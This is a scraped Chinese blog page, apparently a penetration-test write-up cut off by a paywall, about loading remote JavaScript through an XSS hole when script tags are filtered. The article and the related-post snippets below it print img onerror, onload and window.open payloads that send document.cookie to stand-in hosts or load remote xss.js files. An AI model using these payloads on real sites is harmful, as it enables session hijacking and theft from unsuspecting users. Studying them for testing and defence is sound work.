XSS漏洞之加载远程js文件

最新推荐文章于 2024-05-15 09:39:03 发布
最新推荐文章于 2024-05-15 09:39:03 发布
阅读量1.9k 收藏 1
点赞数
文章标签: php 后端 javascript ViewUI
原文链接:http://www.cnblogs.com/bingogo/p/11508370.html
版权
在一次系统渗透测试中,发现了一个XSS漏洞,但script标签被后端过滤。通过研究,使用img标签绕过后端过滤成功加载远程JS文件。尝试了三种方法,最终通过结合jQuery实现。强调理解原理、多思考和实践的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

这次在对一个系统渗透测试过程中,发现一个XSS漏洞,可弹窗,并且没有httponly,但是在尝试加载远程js文件的时候发现,script标签被过滤掉了,准确的说应该是服务器后端在识别到输入内容有<>的时候,会把每对尖括号以及尖括号里面的内容都过滤掉,唯独有一个特例,就是img标签不会。

在网上找了一些资料,发现可以用img来加载远程js,陆陆续续试过以下几个方法:

1.第一种方法

<img src=x οnerrοr=document.body.appendChild(document.createElement('img')).src='//xxx.xxx/a?cookie='+document.cookie>

用这种方式是将cookie写入到自己搭建的服务器下的一个txt文件里,这种方式能起作用,但是没读到cookie,失败了。具体原因应该是img不能加载js文件。<

最低0.47元/天 解锁文章
baiao3360
关注
xss 加载远程第三方JS
Js_123456789的博客
04-24 1398
script 没有调用远程平台,用web接收cookie <script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script> 简单的script链接远程第三方js,省略协议,浏览器自动加载当前页面的协议 <script src=//xxx.xxx/a.js&gt...
XSS漏洞
2401_83181186的博客
04-25 1146
XSS漏洞介绍以及beef,waf简介
XSS调用外部JS
binggoogle的专栏
06-14 3271
jquery和原生两种方法:  1. onload="jQuery.getScript('JS Address')  2. " onload="with(document)body.appendChild(createElement('script')).src='http://172.16.96.13/js/xss.js'"
XSS攻防实战(附JS源码)
我本可以容忍阳光,如果我不曾见过太阳,然而阳光已使我荒凉,成为更新的荒凉。
09-07 1144
授权转载自:乔珂力https://juejin.im/post/6867184627393265677之前写过两篇文章分别介绍了 Cookie :https://juejin.im/p...
js实现img图片懒加载
Wancc123的博客
08-25 588
当然,这只是一个简单的示例代码,实际开发中可能需要处理更多的细节和边界情况。同时,也可以借助第三方的 JavaScript 库来简化懒加载的实现。然后,通过监听滚动、窗口调整大小和屏幕旋转等事件,在合适的时机检查图片是否需要加载。如果图片已经进入可见区域内,就将。在前端中,可以使用 JavaScript 来实现图片的懒加载。上述代码首先在页面加载完成后获取所有带有。类名,触发图片加载
利用js自动解析执行xss
wcwdnmdnmd的博客
07-19 403
使用也window方法可以执行xss js将16进制自动转换为字符串从而绕过关键字检测。
xss漏洞加载远程js文件
06-08
其中一种类型的XSS攻击就是加载远程js文件。攻击者可以在网页中注入恶意代码,通过调用远程服务器上的恶意js文件来实现攻击。 这种攻击可以通过以下几种方式进行防范: 1. 对用户输入进行过滤和验证,防止用户输入...
XSS 漏洞总结
热门推荐
4ct10n
11-03 1万+
xss一直以来接触最少的类型,现在终于有幸将其总结一下了·····,xss漏洞是目前最为常见的漏洞类型之一,其触发脚本经常与js代码有关,所以要想掌握好xss必须要有深厚的js编码功底。本篇内容是我学习xss的总结,会结合着代码编写与实验,对xss进行系统的讲解,以便我更好的认识xss
Web-XSS漏洞
weixin_43916678的博客
05-01 1112
XSS攻击(跨站脚本攻击)是指攻击者利用网站程序对用户输入过滤不足的缺陷,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 XSS攻击主要影响的是用户端的安全,包含用户信息安全、权限安全等。并且多数XSS攻击都依赖于JavaScript脚本开展。 核心要求是构造出能够让前端执行的JS代码,让攻击者的JS代码在受害者浏览器上执行,攻击系统用户而不是系统本身。 JS运行条件:代码位于< script >标签中、代
【SRC实战】文件名回显导致反射型XSS,URL重定向
最新发布
qq_45196785的博客
05-15 492
2、修改文件名为meta标签,延迟1秒,自动重定向到第三方网站。1、反射型XSS获取用户cookie或者执行恶意JS操作。1、灯塔扫到敏感文件,发现1.txt会在页面回显文件名。“ 以下漏洞均为实验靶场,如有雷同,纯属巧合 ”3、修改文件名为script标签,触发XSS漏洞。2、URL重定向到仿冒网站导致用户账户被盗。“ 文件名回显,能否触发URL重定向?“ 文件名回显,能否触发XSS?2、修改文件名为del标签。3、重定向到第三方网站。
17-xss漏洞
qq_56414082的博客
03-29 866
onload 事件会在页面或图像加载完成后立即发生。onload 通常用于 元素,在页面完全载入后(包括图片、css文件等等。)执行脚本代码。Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透;BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单。启动BeFF-XSS并登陆进去可以通过命令也可以图形化页面。
XSS跨站脚本攻击漏洞(1)
weixin_51339377的博客
04-05 3539
XSS漏洞介绍: xss攻击的目录就是让前端把我们的攻击代码执行 跨站攻击 全都是前端的 只需要右击查看源代码就可以查看到漏洞了 测试漏洞方式:弹窗测试(测试成功以后具体功能实现的xss代码有很多免费的xss平台 可以直接使用) 弹窗基本代码: <script>alert(1)</script> 在输入框输入代码提交以后如果出现弹窗说明存在xss漏洞。此时提交成功可以右键在网页源代码里面看到自己提交上去的js代码 因为本身存储框,留言板这种就会在...
图片xss的利用方法
dhyi38680的博客
12-26 1509
  在使用类似ueditor这样的网页编辑器时,由于编辑器本身支持的源码编辑功能,如果过滤的不够完善,攻击者可以通过写入js来执行脚本语句,达成存储型xss的效果。   当然,如今的编辑器安全方面做的都已经相当不错,能够自动触发的恶意脚本已经是很难写入了,剩下还比较容易受控的,就是点击触发的外部链接了。前段时间,我就在尝试利用了外部链接进行csrf时,小伙伴提醒我可以尝试一下图片xss...
XSS利用
YIN_XIAOMAO的博客
05-29 411
XSS利用方式较多,多研究总有一个适合你,XSS防御方式较多,多种方式联动防御才好。
xss其他标签下的js用法总结
lowerxiaoshen的博客
10-30 2258
xss其他标签下的js用法总结大全<script src=js地址></script>实际上我们的测试语句可能为↓<script>alert("90sec")</script>也就是说js语句实际上是位于↓ <script></script>的中间。包括<img>、<input>、<object>、<iframe>、<a></a>、<svg>、标签等情况下的xss构造。所以我们就需要了解各种标签下
跨站脚本攻击(XSS)详解
Karka_的博客
01-02 1375
XSS(Cross Site Script)攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。一开始,这种攻击的演示案例是跨域的,所以叫做"跨站脚本"。现在是否跨域已经不再重要,但是名字一直沿用下来。XSS长期以来被列为客户端Web安全中的头号大敌。因为XSS破坏力强大,且产生的场景复杂,难以一次性解决。下面举个XSS的例子php?如果用户提交了一段HTML代码alert(/xss/)就会在页面中执行,弹出框显示/xss/。
JS中的鼠标事件
m0_70185826的博客
07-01 1万+
通过鼠标触发事件,类似用户的行为:mouseover事件和mouseenter事件,都是鼠标进入一个节点时触发。两者的区别是,mouseenter事件只触发一次,而只要鼠标在节点内部移动,mouseover事件会在子节点上触发多次。 MouseEvent.button属性返回一个数值,表示事件发生时按下了鼠标的哪个键。 0代表左键 1代表中键 2代表右键 2. MouseEvent.clientX,MouseEvent.clientY MouseEvent.clientX属性返回鼠标位置相对于浏
Xss里img标签的一些利用
weixin_34358365的博客
02-05 2211
<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974"></img> “><img src=x onerror=”with(document)body.appendChild(createElemen...
xss攻击实例 php,记一次原生JS实现XSS攻击案例
weixin_32052253的博客
04-03 547
XSS:跨站脚本(Cross-site scripting)攻击手段和目的:攻击者使被攻击者在浏览器中执行脚本后,如果需要收集来自被攻击者的数据(如cookie或其他敏感信息),可以自行架设一个网站,让被攻击者通过JavaScript等方式把收集好的数据作为参数提交,随后以数据库等形式记录在攻击者自己的服务器上。为了加深自己对XSS攻击的理解,特意尝试了一下,并把整个过程记录下来。攻击过程:①、客...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值